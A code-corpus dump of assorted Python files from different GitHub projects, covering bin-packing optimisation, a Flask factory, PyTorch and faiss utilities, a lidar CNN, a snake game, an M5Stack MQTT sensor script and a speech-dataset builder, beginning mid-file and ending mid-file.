len(Colors)\r\n\r\n\r\n stepone_model = Model(\"BPP\")\r\n\r\n #t = []\r\n #for i in range(N):\r\n #for j in range(i+1):\r\n # if j< UB:\r\n # t.append((j,i))\r\n \r\n\r\n t = []\r\n for i in range(N):\r\n for j in range(UB):\r\n t.append((j,i)) \r\n\r\n l = tuplelist(t)\r\n\r\n\r\n x = stepone_model.addVars(l,vtype= GRB.BINARY, name = \"x\" )\r\n y = stepone_model.addVars(UB,M, vtype= GRB.BINARY, name = \"y\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n for i in range(N):\r\n I = []\r\n for k in l:\r\n if k[1] == i:\r\n I.append(k[0])\r\n stepone_model.addConstr(quicksum(x[q,i] for q in I) == 1)\r\n\r\n for j in range(UB):\r\n I = []\r\n for k in l:\r\n if k[0] == j:\r\n I.append(k[1])\r\n\r\n stepone_model.addConstr(quicksum(x[j,i]*w[i] for i in I) <= C )\r\n\r\n\r\n for j in range(len(Colors)):\r\n for k in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == k:\r\n I.append(q[1])\r\n\r\n for i in I:\r\n if data[i][1] == Colors[j]:\r\n stepone_model.addConstr(x[k,i] <= y[k,j])\r\n\r\n for k in range(len(Colors)):\r\n for j in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == j and q[1] in colj[k]:\r\n I.append(q[1])\r\n stepone_model.addConstr((quicksum(x[j,i] for i in I ) <= y[j,k]*C ))\r\n\r\n for j in range(len(Colors)):\r\n stepone_model.addConstr(quicksum(y[i,j] for i in range(UB)) >= Lc[j])\r\n\r\n\r\n\r\n Obj = quicksum(y[i,j] for j in range(M) for i in range(UB))\r\n\r\n\r\n stepone_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n\r\n stepone_model.setParam('TimeLimit', 60)\r\n stepone_model.optimize()\r\n\r\n mcf = int(stepone_model.objVal)\r\n\r\n startsol = []\r\n for i in t:\r\n startsol.append([i,x[i[0],i[1]].x])\r\n\r\n\r\n #for v in stepone_model.getVars():\r\n # print(\"%s : %g\" %(v.varName,v.x))\r\n\r\n\r\n BPP_model = Model(\"BPP\")\r\n\r\n\r\n Q = []\r\n\r\n for i in Colors:\r\n q = 0\r\n for j in range(len(c)):\r\n if c[j] == i:\r\n q += w[j]\r\n Q.append(q)\r\n\r\n\r\n duplicates = []\r\n W = []\r\n for i in Q:\r\n if i not in duplicates:\r\n W.append([i,1])\r\n duplicates.append(i)\r\n else:\r\n for j in range(len(W)):\r\n if W[j][0] == i:\r\n W[j][1] += 1\r\n\r\n if 1 not in duplicates:\r\n duplicates.append(1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n u = BPP_model.addVars(UB, vtype= GRB.BINARY, name = \"u\" )\r\n x = BPP_model.addVars(M,UB, vtype= GRB.CONTINUOUS, name = \"x\", lb=0,ub=1 )\r\n z = BPP_model.addVars(M,UB, vtype= GRB.BINARY, name = \"z\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n for i in range(M):\r\n BPP_model.addConstr(quicksum(x[i,j] for j in range(UB)) == 1)\r\n\r\n BPP_model.addConstrs(quicksum(x[i,j]*Q[i] for i in range(M)) <= C*u[j] for j in range(UB))\r\n\r\n BPP_model.addConstr(quicksum(z[i,j] for i in range(M) for j in range(UB))-M <= mcf )\r\n\r\n for k in range(UB):\r\n for i in range(M):\r\n BPP_model.addConstr(x[i,k] <= z[i,k])\r\n \r\n\r\n\r\n Obj = quicksum(u[i] for i in range(UB))\r\n\r\n BPP_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n\r\n BPP_model.optimize()\r\n\r\n Bins = BPP_model.objVal\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n steptwo_model = Model(\"BPP\")\r\n\r\n #t = []\r\n #for i in range(N):\r\n #for j in range(i+1):\r\n # if j< UB:\r\n # t.append((j,i))\r\n \r\n\r\n\r\n #l = tuplelist(t)\r\n\r\n x = steptwo_model.addVars(l,vtype= GRB.BINARY, name = \"x\" )\r\n #.GetVarByName()\r\n for i in range(len(t)):\r\n x[t[i][0],t[i][1]].start = startsol[i][1]\r\n\r\n\r\n\r\n y = steptwo_model.addVars(UB,M, vtype= GRB.BINARY, name = \"y\")\r\n z = steptwo_model.addVars(UB, vtype= GRB.BINARY, name = \"z\")\r\n\r\n\r\n\r\n 
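    # (added annotation, inferred from the model structure; not author text)
    # Step 3 of the three-step scheme: fix the minimum colour fragmentation
    # `mcf` found by stepone_model and the bin-count lower bound `Bins` from
    # the aggregated BPP_model, then minimise the number of open bins z[j].
    # The x variables reuse the step-1 assignment (startsol) as a MIP warm
    # start via the .start attributes set above.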
steptwo_model.addConstr(quicksum(y[i,j] for j in range(M) for i in range(UB)) <= mcf)\r\n\r\n for i in range(N):\r\n I = []\r\n for k in l:\r\n if k[1] == i:\r\n I.append(k[0])\r\n steptwo_model.addConstr(quicksum(x[q,i] for q in I) == 1)\r\n\r\n for j in range(UB):\r\n I = []\r\n for k in l:\r\n if k[0] == j:\r\n I.append(k[1])\r\n\r\n steptwo_model.addConstr(quicksum(x[j,i]*w[i] for i in I) <= C*z[j] )\r\n\r\n\r\n for j in range(len(Colors)):\r\n for k in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == k:\r\n I.append(q[1])\r\n\r\n for i in I:\r\n if data[i][1] == Colors[j]:\r\n steptwo_model.addConstr(x[k,i] <= y[k,j])\r\n\r\n for k in range(len(Colors)):\r\n for j in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == j and q[1] in colj[k]:\r\n I.append(q[1])\r\n steptwo_model.addConstr((quicksum(x[j,i] for i in I ) <= y[j,k]*C ))\r\n\r\n\r\n for j in range(len(Colors)):\r\n steptwo_model.addConstr(quicksum(y[i,j] for i in range(UB)) >= Lc[j])\r\n\r\n #for i in range(UB-1):\r\n #steptwo_model.addConstr(z[i] >= z[i+1] )\r\n\r\n steptwo_model.addConstr(quicksum(z[i] for i in range(UB)) >= Bins)\r\n\r\n Obj = quicksum(z[i] for i in range(UB))\r\n\r\n steptwo_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n steptwo_model.setParam('TimeLimit', 300)\r\n steptwo_model.optimize()\r\n\r\n print(\"Objective function value: %f\" %steptwo_model.objVal)\r\n for v in steptwo_model.getVars():\r\n print(\"%s : %g\" %(v.varName,v.x))\r\n\r\n X = []\r\n for var in steptwo_model.getVars():\r\n if \"x\" in var.VarName:\r\n if var.xn > 0:\r\n X.append(['%s %g' %(var.varName, var.xn)])\r\n\r\n\r\n used_bins = []\r\n for i in X:\r\n for j in i:\r\n j = j.split(\"[\")\r\n j = j[1].split(\",\")\r\n if j[0] not in used_bins:\r\n used_bins.append(j[0])\r\n\r\n Y = 0\r\n\r\n for var in steptwo_model.getVars():\r\n if \"y\" in var.VarName:\r\n Y += var.xn\r\n\r\n\r\n\r\n\r\n MCF = Y \r\n runtime = steptwo_model.Runtime\r\n BPP = len(used_bins)\r\n print(\"Bins used: %f\" %BPP)\r\n print(\"Objective function value: %f\" % steptwo_model.objVal)\r\n print(\"Minimum Color Fragmentation: %f\" %MCF)\r\n print(\"Runtime is: %f\" %runtime)\r\n return [runtime,MCF,BPP]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MBBossenbroek/BPPMCF","sub_path":"code/Item_symmetry.py","file_name":"Item_symmetry.py","file_ext":"py","file_size_in_byte":8690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36047530922","text":"from flask import Flask\nfrom app.routes import init_routes\nimport config\n\n\ndef create_app() -> Flask:\n app = Flask(__name__,\n static_folder=config.STATIC_FOLDER,\n template_folder=config.TEMPLATE_FOLDER)\n app.config.from_object(config)\n init_routes(app)\n\n return app\n","repo_name":"wvw321/web-manga-translation","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14190377163","text":"import torch\nfrom torch.utils.data import Dataset\nfrom mol_featurizer import *\nfrom word2vec import seq_to_kmers, get_protein_embedding\nfrom gensim.models import Word2Vec\nimport json\nimport random\n\ndef load_data_map(smiles_mapping_path, protein_seq_mapping_path, chembl_uniprot_mapping_path):\n # Load mappings...\n # Load SMILES mapping\n smiles_mapping = {}\n # if the file is tsv, use the following code\n if smiles_mapping_path.endswith(\".tsv\"):\n with open(smiles_mapping_path, \"r\") as f:\n for line in 
f:\n _,chembl_id, smiles = line.strip().split('\\t')\n smiles_mapping[chembl_id] = smiles\n else:\n # if the file is json, use the following code\n with open(smiles_mapping_path, \"r\") as f:\n smiles_mapping = json.load(f)\n # Load protein sequence mapping \n with open(protein_seq_mapping_path, \"r\") as f:\n protein_seq_mapping = json.load(f)\n\n # Load Chembl to Uniprot mapping\n with open(chembl_uniprot_mapping_path, \"r\") as f:\n chembl_uniprot_mapping = json.load(f)\n \n return smiles_mapping, protein_seq_mapping, chembl_uniprot_mapping\n\n\nclass ProteinCompoundDataset(Dataset):\n def __init__(self, data, smiles_mapping, protein_seq_mapping, chembl_uniprot_mapping, unlabeled=False):\n self.data = data\n self.smiles_mapping = smiles_mapping\n self.protein_seq_mapping = protein_seq_mapping\n self.chembl_uniprot_mapping = chembl_uniprot_mapping\n self.word_model = Word2Vec.load(\"/raid/home/yoyowu/TransformerCPI/GPCR/word2vec_30.model\")\n self.unlabeled = unlabeled\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if self.unlabeled:\n compound_id, uniprot_id = self.data[idx]\n else:\n compound_id, uniprot_id, label = self.data[idx]\n # convert label to float if it is string \n if isinstance(label, str):\n label = float(label)\n \n smiles = self.smiles_mapping.get(compound_id, None)\n \n chembl_id_for_protein = next((k for k, v in self.chembl_uniprot_mapping.items() if v == uniprot_id), None)\n\n protein_seq = self.protein_seq_mapping.get(chembl_id_for_protein, None)\n if protein_seq is not None:\n protein_embedding = torch.tensor(get_protein_embedding(self.word_model, seq_to_kmers(protein_seq)))\n else:\n protein_embedding = None\n \n if smiles is None or protein_seq is None or chembl_id_for_protein is None:\n # Handle missing data\n return None\n \n atom_feature, adj = mol_features(smiles)\n if self.unlabeled:\n return torch.tensor(atom_feature), torch.tensor(adj), protein_embedding\n else:\n return torch.tensor(atom_feature), torch.tensor(adj), protein_embedding, torch.tensor(int(label))\n\n\n\ndef pack(atoms, adjs, proteins, labels):\n atoms_len = 0\n proteins_len = 0\n\n N = len(atoms)\n\n atom_num = torch.zeros((N, 1))\n i = 0\n for atom in atoms:\n atom_num[i] = atom.shape[0]\n i += 1\n if atom.shape[0] >= atoms_len:\n atoms_len = atom.shape[0]\n\n protein_num = torch.zeros((N, 1))\n i = 0\n for protein in proteins:\n protein_num[i] = protein.shape[0]\n i += 1\n if protein.shape[0] >= proteins_len:\n proteins_len = protein.shape[0]\n\n atoms_new = torch.zeros((N, atoms_len, 34))\n i = 0\n for atom in atoms:\n a_len = atom.shape[0]\n atoms_new[i, :a_len, :] = atom\n i += 1\n\n adjs_new = torch.zeros((N, atoms_len, atoms_len))\n i = 0\n for adj in adjs:\n a_len = adj.shape[0]\n adj = adj + torch.eye(a_len)\n adjs_new[i, :a_len, :a_len] = adj\n i += 1\n\n proteins_new = torch.zeros((N, proteins_len, 100))\n i = 0\n for protein in proteins:\n a_len = protein.shape[0]\n proteins_new[i, :a_len, :] = protein\n i += 1\n\n labels_new = torch.zeros(N)\n i = 0\n for label in labels:\n labels_new[i] = label\n i += 1\n return atoms_new, adjs_new, proteins_new, labels_new, atom_num, protein_num\n\n\ndef collate_fn(batch):\n \"\"\"\n Args batch: list of data, each atom, adj, protein, label = data\n \"\"\"\n atoms, adjs, proteins, labels = zip(*batch)\n return pack(atoms, adjs, proteins, labels)\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n 
torch.cuda.manual_seed(seed)","repo_name":"AdorableYoyo/TransformerCPI","sub_path":"GPCR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73318253172","text":"import computed_property\n\nclass Circle:\n def __init__(self, radius=1):\n self.radius = radius\n\n @computed_property('radius', 'area')\n def diameter(self):\n \"\"\"Circle diameter from radius\"\"\"\n print(\"Calculating diameter\")\n return self.radius * 2\n \n @diameter.setter\n def diameter(self, diameter):\n self.radius = diameter / 2\n \n @diameter.deleter\n def diameter(self):\n self.radius = 0\n\ncircle = Circle()\nprint(circle.diameter)\nprint(circle.diameter)\ncircle.diameter = 3\nprint(circle.radius)\ndel circle.diameter\nprint(circle.radius)\nhelp(Circle)\n","repo_name":"juan-faria/bwgi-computed-property","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"837989194","text":"from Models.regressor import Regressor\nfrom Models.darknet19 import Darknet19\nfrom Models.mobilenetv2 import MobileNetV2\nimport torch\nimport torch.nn as nn\nimport sys\n\n\nnet_cfgs = [\n # conv1s\n [(32, 3)],\n ['M', (64, 3)],\n ['M', (128, 3), (64, 1), (128, 3)],\n ['M', (256, 3), (128, 1), (256, 3)],\n ['M', (512, 3), (256, 1), (512, 3), (256, 1), (512, 3)],\n # conv2\n ['M', (1024, 3), (512, 1), (1024, 3), (512, 1), (1024, 3)],\n # ------------\n # conv3\n #[(1024, 3), (1024, 3)],\n # conv4\n #[(1024, 3)],\n [(1280,1)]\n ]\n\n\"\"\"\n _summary_ = Lidar CNN model for pose estimation\n\n Returns:\n Tensor: concatenated output of translation and rotation\n\"\"\"\nclass LidarCNN(nn.Module):\n def __init__(self,in_channels=6, translation = 3, rotation = 3):\n super(LidarCNN,self).__init__()\n self.featureNet = self.create_darknet19_features()\n \n # self.translationNet = Regressor(\n # in_channels=1280,\n # out_channels=2*translation,\n # )\n \n # self.rotationNet = Regressor(\n # in_channels=1280,\n # out_channels=2*rotation,\n # )\n \n self.init_weights()\n \n def create_darknet19_features(self):\n features = []\n in_channels = 6\n for _,layers in enumerate(net_cfgs):\n for layer in layers:\n if layer == 'M':\n features.append(nn.MaxPool1d(kernel_size=2,stride=2))\n else:\n out_channels,kernel_size = layer\n if kernel_size == 1:\n features.append(nn.Conv1d(in_channels,out_channels,kernel_size,1))\n else:\n features.append(nn.Conv1d(in_channels,out_channels,kernel_size,1,1))\n features.append(nn.BatchNorm1d(out_channels))\n features.append(nn.LeakyReLU(0.1))\n in_channels = out_channels\n features.append(nn.AdaptiveAvgPool1d((1)))\n return nn.Sequential(*features) \n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n \n def forward(self,x):\n # self.ft = self.featureNet(x).view(x.size(0),-1)\n # translation = self.translationNet(self.ft)\n # rotation = self.rotationNet(self.ft)\n \n # return torch.cat((translation, rotation), dim=1)\n return self.featureNet(x).view(x.size(0),-1)\n \nif __name__ == 
'__main__':\n model = LidarCNN()\n x=torch.randn(4,6,13000)\n print(model(x).shape)\n \n ","repo_name":"bilalkah/MachineLearning","sub_path":"biloCNN/extra/LidarCNN.py","file_name":"LidarCNN.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41354161166","text":"from ast import parse\nfrom operator import index\nimport os\nfrom random import sample, seed\nimport faiss\nimport math\nfrom basicts.runners.data_store import DataStore\nimport numpy as np\nimport time\nimport argparse\n\n\nclass IndexBuilder:\n\n def __init__(self, dstore_dir, used_hidden=\"hiddens\", use_gpu=False, metric=\"l2\", suffix=\"\"):\n\n self.dstore_dir = dstore_dir\n self.dstore = DataStore.from_pretrained(dstore_dir=dstore_dir, used_hidden=used_hidden, mode=\"r\", subset=\"train\")\n self.use_gpu = use_gpu\n self.metric = metric\n self.suffix =suffix\n self.used_hidden = used_hidden\n\n def exists(self):\n return os.path.exists(self.trained_file) and os.path.exists(self.faiss_file)\n\n @property\n def trained_file(self):\n file_path = os.path.join(self.dstore_dir, \"faiss_store.trained.{}.{}{}\".format(self.used_hidden, self.metric, self.suffix))\n return file_path\n\n @property\n def faiss_file(self):\n file_path = os.path.join(self.dstore_dir, \"faiss_store.{}.{}{}\".format(self.used_hidden, self.metric, self.suffix))\n return file_path\n\n def get_auto_index_type(self):\n \"\"\"we choose index type by https://github.com/facebookresearch/faiss/wiki/Guidelines-to-choose-an-index\"\"\"\n dstore_size = self.dstore.dstore_size\n if dstore_size < 3000:\n return \"IDMap,,Flat\"\n clusters = min(int(4 * math.sqrt(dstore_size)), dstore_size // 30, 131072)\n if dstore_size < 30000:\n return \"IDMap,,Flat\"\n if dstore_size < 10 ** 6:\n return f\"OPQ32_{self.dstore.hidden_size},IVF{clusters},PQ32\" # we use 64 here since faiss does not support >64 in gpu mode\n return f\"OPQ32_{self.dstore.hidden_size},IVF{clusters}_HNSW32,PQ32\"\n\n def build(self, index_type, chunk_size=1000000, seed=None, start=0, overwrite=False):\n if index_type == \"auto\":\n index_type = self.get_auto_index_type()\n\n self.train(index_type=index_type, max_num=chunk_size, seed=seed, overwrite=overwrite)\n print(\"Adding Keys.\")\n pretrained_file = self.trained_file\n\n if os.path.exists(self.faiss_file) and not overwrite:\n pretrained_file = self.faiss_file\n print(\"faiss index file exists, use it as pretrain index\")\n\n index = faiss.read_index(pretrained_file)\n if pretrained_file == self.faiss_file:\n start = index.ntotal\n print(\"start from {} lines, due to pretrained faiss file: {}\".format(start, self.faiss_file))\n dstore_size = self.dstore.dstore_size\n start_time = time.time()\n while start < dstore_size:\n end = min(dstore_size, start + chunk_size)\n to_add = np.array(self.dstore.keys[start:end])\n if self.metric == \"cosine\":\n norm = np.sqrt(np.sum(to_add ** 2, axis=-1, keepdims=True))\n if (norm == 0).any():\n print(f\"found zero norm vector in {self.dstore.dstore_dir}\")\n norm = norm + 1e-10\n to_add = to_add / norm\n index.add(to_add.astype(np.float32))\n start = end\n\n print(\"Add {} tokens so far\".format(index.ntotal))\n faiss.write_index(index, self.faiss_file)\n print(\"Adding total {} keys.\".format(index.ntotal))\n print(\"Adding took {} s\".format(time.time() - start_time))\n print(\"Writing Index\")\n start = time.time()\n faiss.write_index(index, self.faiss_file)\n print(\"Writing index took {} s\".format(time.time() 
- start_time))\n print(\"Wrote data to {}\".format(self.faiss_file))\n\n\n def train(self, index_type, max_num=None, seed=None, overwrite=False):\n hidden_size, dstore_size = self.dstore.hidden_size, self.dstore.dstore_size\n if os.path.exists(self.trained_file) and not overwrite:\n print(\"trained file already existes. Us existing file: {}\".format(self.trained_file))\n return\n\n metric = faiss.METRIC_L2 if self.metric == \"l2\" else faiss.METRIC_INNER_PRODUCT\n index = faiss.index_factory(hidden_size, index_type, metric)\n\n if self.use_gpu:\n print(\"Using gpu for training\")\n res = faiss.StandardGpuResources()\n co = faiss.GpuClonerOptions()\n\n index = faiss.index_cpu_to_gpu(res, 0, index, co)\n\n if self.dstore.dstore_size < max_num:\n sample_keys = np.array(self.dstore.keys.astype(np.float32))\n else:\n np.random.seed(seed)\n max_num = max_num or self.dstore.dstore_size\n sample_keys = np.array(self.dstore.keys[-max_num:].astype(np.float32))\n if self.metric == \"cosine\":\n norm = np.sqrt(np.sum(sample_keys ** 2, axis=-1, keepdims=True))\n if (norm == 0).any():\n print(\"find zero norm vector in {}\".format(self.dstore.dstore_dir))\n norm = norm + 1e-10\n sample_keys = sample_keys / norm\n\n start = time.time()\n print(\"Training Index\")\n index.verbose = True\n index.train(sample_keys)\n print(\"Training took {} s\".format(time.time() - start))\n if self.use_gpu:\n index = faiss.index_gpu_to_cpu(index)\n print(\"Writing index after training\")\n\n start = time.time()\n faiss.write_index(index, self.trained_file)\n print(\"Writing index took {} s\".format(time.time() - start))\n\n\ndef build(dstore_dir, used_hidden=\"tsformer\", index_type=\"auto\", use_gpu=False, metric=\"l2\", suffix=\"\", overwrite=False, seed=None, chunk_size=1000000):\n index_buider = IndexBuilder(dstore_dir=dstore_dir, use_gpu=use_gpu, metric=metric, suffix=suffix)\n if overwrite or not index_buider.exists():\n index_buider.build(index_type=index_type, seed=seed, chunk_size=chunk_size, overwrite=overwrite)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--index_type\", default=\"auto\", type=str)\n parser.add_argument(\"--use_gpu\", default=True, action='store_true')\n parser.add_argument('--metric', type=str, default=\"l2\", choices=[\"l2\", \"ip\", \"cosine\"],\n help='faiss index metric, l2 for L2 distance, ip for inner product, '\n 'cosine for cosine similarity')\n parser.add_argument(\"--suffix\", default=\"\", type=str)\n parser.add_argument('--chunk_size', default=1000000, type=int,\n help='can only load a certain amount of data to memory at a time.')\n parser.add_argument('--seed', type=int, default=123, help='random seed')\n parser.add_argument(\"--overwrite\", action=\"store_true\", default=False,\n help=\"if True, delete old faiss_store files before generating new ones\")\n parser.add_argument(\"--dstore_dir\", type=str, default=\"./data_store\", help=\"paths to data store. 
if provided multiple,\"\n \"use ',' as separator\")\n parser.add_argument(\"--used_hidden\", default=\"tsformer\", type=str)\n args = parser.parse_args()\n build(args.dstore_dir, used_hidden=args.used_hidden, index_type=args.index_type, use_gpu=args.use_gpu, seed=args.seed,\n metric=args.metric, suffix=args.suffix, overwrite=args.overwrite, chunk_size=args.chunk_size)\n\n\n\n","repo_name":"hlhang9527/KNN-MTS","sub_path":"basicts/runners/index_builder.py","file_name":"index_builder.py","file_ext":"py","file_size_in_byte":6841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73963854773","text":"import pygame\nimport src.constants as const\n\n\nclass Snake(pygame.sprite.Sprite):\n\n def __init__(self, head_img, tail_img):\n pygame.sprite.Sprite.__init__(self)\n self.snake_head_img = head_img\n self.snake_tail_img = tail_img\n self.image = pygame.transform.scale(self.snake_head_img, (const.PIECE_SIZE, const.PIECE_SIZE))\n self.rect = self.image.get_rect()\n self.rect.center = [const.WIDTH / 2, const.HEIGHT / 2]\n self.pieces = []\n self.length = 1\n self.speedx = 0\n self.speedy = 0\n self.score = 0\n self.direction = None\n\n def update(self):\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx = -const.SPEED\n self.speedy = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 90)\n self.direction = \"L\"\n elif keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx = const.SPEED\n self.speedy = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 270)\n self.direction = \"R\"\n elif keystate[pygame.K_UP] or keystate[pygame.K_w]:\n self.speedy = -const.SPEED\n self.speedx = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 360)\n self.direction = \"U\"\n elif keystate[pygame.K_DOWN] or keystate[pygame.K_s]:\n self.speedy = const.SPEED\n self.speedx = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 180)\n self.direction = \"D\"\n\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n\n def draw(self, window):\n for i in self.pieces[:-2]:\n if self.direction == \"L\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 270), [i[0], i[1]])\n if self.direction == \"R\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 90), [i[0], i[1]])\n if self.direction == \"U\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 180), [i[0], i[1]])\n if self.direction == \"D\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 360), [i[0], i[1]])\n\n def collision(self, col_type):\n if col_type == 'score':\n self.length += const.APPLE_LENGTH\n self.score += const.APPLE_SCORE\n const.FPS += const.APPLE_SPEED\n elif col_type == 'acc':\n self.score += const.ICECREAM_SCORE\n const.FPS += const.ICECREAM_SPEED\n else:\n self.score = max(0, self.score + const.PIZZA_SCORE)\n const.FPS = max(const.DEFAULT_FPS, const.FPS + const.PIZZA_SPEED)\n\n def boarder_collisions(self):\n if self.rect.right > const.WIDTH or self.rect.left < 0 or self.rect.top < 0 or self.rect.bottom > const.HEIGHT:\n return True\n return False\n","repo_name":"lavalxl/Python-Projects","sub_path":"snake_game/src/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35509856585","text":"import os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nfrom umqtt import *\nimport time\nfrom unit import 
*\n\n\ni2c0 = None\nmqtt_client = None\nenv3_0 = None\n\n\ntemp = None\nmsg = None\nroom = None\n\n\ndef setup():\n global i2c0, mqtt_client, env3_0, temp, msg, room\n\n i2c0 = I2C(0, scl=Pin(1), sda=Pin(2), freq=100000)\n env3_0 = ENV(i2c=i2c0, type=3)\n M5.begin()\n mqtt_client = MQTTClient('hellom5', 'm5server.local', port=1883, user='atom1', password='test4375', keepalive=300)\n mqtt_client.connect(clean_session=True)\n room = ' office'\n\n\ndef loop():\n global i2c0, mqtt_client, env3_0, temp, msg, room\n temp = env3_0.read_temperature()\n temp = temp * 1.8\n temp = temp + 32\n msg = (str(temp)) + room\n mqtt_client.publish('temp', msg, qos=0)\n time.sleep(2)\n\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n loop()\n except (Exception, KeyboardInterrupt) as e:\n try:\n from utility import print_error_msg\n print_error_msg(e)\n except ImportError:\n print(\"please update to latest firmware\")\n","repo_name":"davidd4375/m5stack_home_temp_co2","sub_path":"atoms3_temp.py","file_name":"atoms3_temp.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72376268852","text":"#! /usr/bin/env python\n\n\"\"\"\nVersion: 1.0.0 (Jan 10, 2019)\nAuthor: Harold Andreas Zellner - hoopiger@googlemail.com\n\n\"\"\"\n\nimport os\nimport sqlite3\nimport argparse\nimport random\nimport numpy as np\nimport re\nfrom multiprocessing import Pool , cpu_count\nfrom toolbox import tools, downloader, crawler , alphabet, transformer\n\n\n\n\ndef create_query():\n # search for query files\n files = tools.search_path(str(language_path) + 'sql_query')\n all_query = []\n query_not = []\n for found in files:\n table = str(str(found).split('/')[-1]).replace('.txt','')\n # read file only if tablename exist\n if table in sql_tables:\n querys = tools.get_file(found,True)\n if len(querys) > 0:\n # discard all unusefull stuff\n for query in querys:\n if query != '' and query != ' ':\n ind = 0\n q_set = ''\n # find and discard ! 
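                    # (added annotation) Convention used by the sql_query
                    # files: a term ending in '!' is an exclusion. The
                    # character scan below strips the trailing '!' and routes
                    # the term to query_not (rendered further down as
                    # "NOT LIKE" clauses); all other terms go to all_query
                    # (rendered as "LIKE" clauses).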
\n for q in query:\n ind += 1\n if len(query) == ind and q == '!':\n query_not.append([q_set,table])\n break\n else:\n q_set += q\n if len(query) == ind: \n all_query.append([q_set,table])\n\n sql = ''\n # get min max values from arguments or defaults\n for m in sql_minmax:\n minvalue = m[1][0]\n maxvalue = m[1][1]\n if minvalue == 0.0 and maxvalue == 0.0:\n pass\n else:\n if str(m[0]) == 'samplerate':\n minus = '-1'\n else:\n minus = ''\n if sql == '':\n sql += '(' + str(m[0]) + '>=' + str(minvalue) + str(minus) + ' and ' + str(m[0]) + '<=' + str(maxvalue)\n else:\n sql += ' and ' + str(m[0]) + '>=' + str(minvalue) + str(minus) + ' and ' + str(m[0]) + '<=' + str(maxvalue)\n if sql == '':\n sql += '(errors=0'\n else:\n sql += ' and errors=0'\n for x in range(2):\n if x == 0:\n like = 'not like'\n operator = 'and'\n query_temp = query_not\n elif x == 1:\n like = 'like'\n operator = 'or'\n query_temp = all_query\n\n sql_temp = ''\n\n\n if len(query_temp) > 0 :\n for query in query_temp:\n if sql_temp == '' and sql != '' and x == 0:\n sql_temp += ' and ' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n elif sql_temp == '' and sql != '' and x == 1:\n sql_temp += ' and (' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n else:\n sql_temp += ' ' + str(operator) + ' ' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n \n if x == 1 and sql_temp == '':\n pass\n else:\n sql += sql_temp + ')'\n \n\n return sql\n\n\n \n\n\n\n\ndef create_train_files():\n tools.printer(22,'wordlength',args.wordlength,True,model_path + 'info/training.txt')\n tools.printer(22,'numbers',args.numbers,True,model_path + 'info/training.txt')\n tools.printer(22,'upper',args.upper,True,model_path + 'info/training.txt')\n tools.printer(22,'lower',args.lower,True,model_path + 'info/training.txt')\n tools.printer(-3)\n # get sentences from db and clean them\n newlines = clean_sentences([1],True,True)\n tri_sentences = newlines[1]\n dropped = newlines[2]\n newlines = newlines[0]\n maxlines = len(newlines)\n\n test = int(round(maxlines * 0.15 ))\n train = int(float(maxlines - test * 2 ))\n random.shuffle(newlines)\n test_files = []\n train_files = []\n dev_files = []\n test_files.append('wav_filename,wav_filesize,transcript')\n train_files.append('wav_filename,wav_filesize,transcript')\n dev_files.append('wav_filename,wav_filesize,transcript')\n for line in newlines:\n if 